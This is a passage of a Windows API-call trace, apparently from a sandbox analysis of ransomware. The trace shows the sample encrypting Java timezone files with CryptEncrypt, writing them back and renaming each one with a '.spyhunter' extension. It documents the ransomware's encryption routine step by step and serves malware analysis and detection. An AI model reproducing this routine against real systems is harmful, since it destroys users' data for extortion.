nNumberOfBytesToWrite=0x24c, lpNumberOfBytesWritten=0x57e694, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e694*=0x24c, lpOverlapped=0x0) returned 1 [0167.788] GetProcessHeap () returned 0x2c0000 [0167.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.788] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.788] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e694, lpOverlapped=0x0 | out: lpBuffer=0x57e6d4*, lpNumberOfBytesWritten=0x57e694*=0x4, lpOverlapped=0x0) returned 1 [0167.788] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e694, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e694*=0x30, lpOverlapped=0x0) returned 1 [0167.788] CloseHandle (hObject=0xa0) returned 1 [0167.789] GetProcessHeap () returned 0x2c0000 [0167.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.789] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fiji.spyhunter") returned 66 [0167.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fiji" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fiji"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fiji.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fiji.spyhunter")) returned 1 [0167.791] GetProcessHeap () returned 0x2c0000 [0167.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.791] GetProcessHeap () returned 0x2c0000 [0167.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.791] GetProcessHeap () returned 0x2c0000 [0167.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec37c0 | out: hHeap=0x2c0000) returned 1 [0167.791] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6d8 | out: pbBuffer=0x57e6d8) returned 1 [0167.791] GetProcessHeap () returned 0x2c0000 [0167.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.791] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6d0*=0x30) returned 1 [0167.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fakaofo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fakaofo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.792] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fakaofo") returned 59 [0167.792] StrStrW (lpFirst="Fakaofo", lpSrch=".txt") returned 0x0 [0167.792] GetProcessHeap () returned 0x2c0000 [0167.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.792] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e694, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e694*=0x4d, lpOverlapped=0x0) returned 1 [0167.793] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.793] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x57e694, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e694*=0x4d, lpOverlapped=0x0) returned 1 [0167.793] GetProcessHeap () returned 0x2c0000 [0167.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.793] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.793] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e694, lpOverlapped=0x0 | out: lpBuffer=0x57e6d4*, lpNumberOfBytesWritten=0x57e694*=0x4, lpOverlapped=0x0) returned 1 [0167.793] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e694, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e694*=0x30, lpOverlapped=0x0) returned 1 [0167.794] CloseHandle (hObject=0xa0) returned 1 [0167.794] GetProcessHeap () returned 0x2c0000 [0167.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.794] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fakaofo.spyhunter") returned 69 [0167.794] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fakaofo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fakaofo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fakaofo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fakaofo.spyhunter")) returned 1 [0167.802] GetProcessHeap () returned 0x2c0000 [0167.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.802] GetProcessHeap () returned 0x2c0000 [0167.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.803] GetProcessHeap () returned 0x2c0000 [0167.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3700 | out: hHeap=0x2c0000) returned 1 [0167.803] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6d0 | out: pbBuffer=0x57e6d0) returned 1 [0167.803] GetProcessHeap () returned 0x2c0000 [0167.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.803] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6c8*=0x30) returned 1 [0167.803] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Enderbury" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\enderbury"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.804] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Enderbury") returned 61 [0167.805] StrStrW (lpFirst="Enderbury", lpSrch=".txt") returned 0x0 [0167.805] GetProcessHeap () returned 0x2c0000 [0167.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.805] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e68c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e68c*=0x59, lpOverlapped=0x0) returned 1 [0167.806] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.806] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x57e68c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e68c*=0x59, lpOverlapped=0x0) returned 1 [0167.806] GetProcessHeap () returned 0x2c0000 [0167.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.806] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.807] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e68c, lpOverlapped=0x0 | out: lpBuffer=0x57e6cc*, lpNumberOfBytesWritten=0x57e68c*=0x4, lpOverlapped=0x0) returned 1 [0167.807] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e68c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e68c*=0x30, lpOverlapped=0x0) returned 1 [0167.807] CloseHandle (hObject=0xa0) returned 1 [0167.807] GetProcessHeap () returned 0x2c0000 [0167.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.807] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Enderbury.spyhunter") returned 71 [0167.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Enderbury" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\enderbury"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Enderbury.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\enderbury.spyhunter")) returned 1 [0167.808] GetProcessHeap () returned 0x2c0000 [0167.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.808] GetProcessHeap () returned 0x2c0000 [0167.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.808] GetProcessHeap () returned 0x2c0000 [0167.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec45c0 | out: hHeap=0x2c0000) returned 1 [0167.808] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6d0 | out: pbBuffer=0x57e6d0) returned 1 [0167.808] GetProcessHeap () returned 0x2c0000 [0167.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.808] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6c8*=0x30) returned 1 [0167.808] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Efate" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\efate"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.809] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Efate") returned 57 [0167.809] StrStrW (lpFirst="Efate", lpSrch=".txt") returned 0x0 [0167.809] GetProcessHeap () returned 0x2c0000 [0167.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.809] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e68c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e68c*=0xe9, lpOverlapped=0x0) returned 1 [0167.810] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.810] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xe9, lpNumberOfBytesWritten=0x57e68c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e68c*=0xe9, lpOverlapped=0x0) returned 1 [0167.810] GetProcessHeap () returned 0x2c0000 [0167.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.810] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.810] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e68c, lpOverlapped=0x0 | out: lpBuffer=0x57e6cc*, lpNumberOfBytesWritten=0x57e68c*=0x4, lpOverlapped=0x0) returned 1 [0167.810] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e68c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e68c*=0x30, lpOverlapped=0x0) returned 1 [0167.811] CloseHandle (hObject=0xa0) returned 1 [0167.811] GetProcessHeap () returned 0x2c0000 [0167.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.811] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Efate.spyhunter") returned 67 [0167.811] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Efate" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\efate"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Efate.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\efate.spyhunter")) returned 1 [0167.811] GetProcessHeap () returned 0x2c0000 [0167.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.812] GetProcessHeap () returned 0x2c0000 [0167.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.812] GetProcessHeap () returned 0x2c0000 [0167.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3640 | out: hHeap=0x2c0000) returned 1 [0167.812] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6c8 | out: pbBuffer=0x57e6c8) returned 1 [0167.812] GetProcessHeap () returned 0x2c0000 [0167.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.812] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6c0*=0x30) returned 1 [0167.812] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Easter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\easter"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.818] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Easter") returned 58 [0167.818] StrStrW (lpFirst="Easter", lpSrch=".txt") returned 0x0 [0167.818] GetProcessHeap () returned 0x2c0000 [0167.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.818] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e684, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e684*=0x4e0, lpOverlapped=0x0) returned 1 [0167.911] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffb20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.911] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x57e684, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e684*=0x4e0, lpOverlapped=0x0) returned 1 [0167.911] GetProcessHeap () returned 0x2c0000 [0167.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.911] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.911] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e684, lpOverlapped=0x0 | out: lpBuffer=0x57e6c4*, lpNumberOfBytesWritten=0x57e684*=0x4, lpOverlapped=0x0) returned 1 [0167.911] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e684, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e684*=0x30, lpOverlapped=0x0) returned 1 [0167.911] CloseHandle (hObject=0xa0) returned 1 [0167.911] GetProcessHeap () returned 0x2c0000 [0167.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.912] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Easter.spyhunter") returned 68 [0167.912] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Easter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\easter"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Easter.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\easter.spyhunter")) returned 1 [0167.913] GetProcessHeap () returned 0x2c0000 [0167.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.913] GetProcessHeap () returned 0x2c0000 [0167.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.913] GetProcessHeap () returned 0x2c0000 [0167.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3580 | out: hHeap=0x2c0000) returned 1 [0167.913] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6c8 | out: pbBuffer=0x57e6c8) returned 1 [0167.913] GetProcessHeap () returned 0x2c0000 [0167.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.913] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6c0*=0x30) returned 1 [0167.913] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vaduz" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vaduz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.935] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vaduz") returned 56 [0167.935] StrStrW (lpFirst="Vaduz", lpSrch=".txt") returned 0x0 [0167.935] GetProcessHeap () returned 0x2c0000 [0167.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.935] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e684, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e684*=0x3f0, lpOverlapped=0x0) returned 1 [0167.937] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffc10, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.937] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x57e684, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e684*=0x3f0, lpOverlapped=0x0) returned 1 [0167.937] GetProcessHeap () returned 0x2c0000 [0167.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.938] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.938] WriteFile (in: hFile=0xb0, lpBuffer=0x57e6c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e684, lpOverlapped=0x0 | out: lpBuffer=0x57e6c4*, lpNumberOfBytesWritten=0x57e684*=0x4, lpOverlapped=0x0) returned 1 [0167.941] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e684, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e684*=0x30, lpOverlapped=0x0) returned 1 [0167.941] CloseHandle (hObject=0xb0) returned 1 [0167.941] GetProcessHeap () returned 0x2c0000 [0167.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.941] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vaduz.spyhunter") returned 66 [0167.941] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vaduz" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vaduz"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vaduz.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vaduz.spyhunter")) returned 1 [0167.942] GetProcessHeap () returned 0x2c0000 [0167.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.942] GetProcessHeap () returned 0x2c0000 [0167.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.942] GetProcessHeap () returned 0x2c0000 [0167.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2bc0 | out: hHeap=0x2c0000) returned 1 [0167.942] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6c0 | out: pbBuffer=0x57e6c0) returned 1 [0167.943] GetProcessHeap () returned 0x2c0000 [0167.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.943] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6b8*=0x30) returned 1 [0167.943] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tirane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tirane"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.943] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tirane") returned 57 [0167.943] StrStrW (lpFirst="Tirane", lpSrch=".txt") returned 0x0 [0167.943] GetProcessHeap () returned 0x2c0000 [0167.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.944] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e67c*=0x48c, lpOverlapped=0x0) returned 1 [0167.956] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb74, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.956] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x48c, lpNumberOfBytesWritten=0x57e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e67c*=0x48c, lpOverlapped=0x0) returned 1 [0167.956] GetProcessHeap () returned 0x2c0000 [0167.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.956] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.956] WriteFile (in: hFile=0xb0, lpBuffer=0x57e6bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e67c, lpOverlapped=0x0 | out: lpBuffer=0x57e6bc*, lpNumberOfBytesWritten=0x57e67c*=0x4, lpOverlapped=0x0) returned 1 [0167.956] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e67c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e67c*=0x30, lpOverlapped=0x0) returned 1 [0167.956] CloseHandle (hObject=0xb0) returned 1 [0167.956] GetProcessHeap () returned 0x2c0000 [0167.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0167.956] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tirane.spyhunter") returned 67 [0167.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tirane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tirane"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tirane.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tirane.spyhunter")) returned 1 [0168.002] GetProcessHeap () returned 0x2c0000 [0168.002] HeapFree (in: 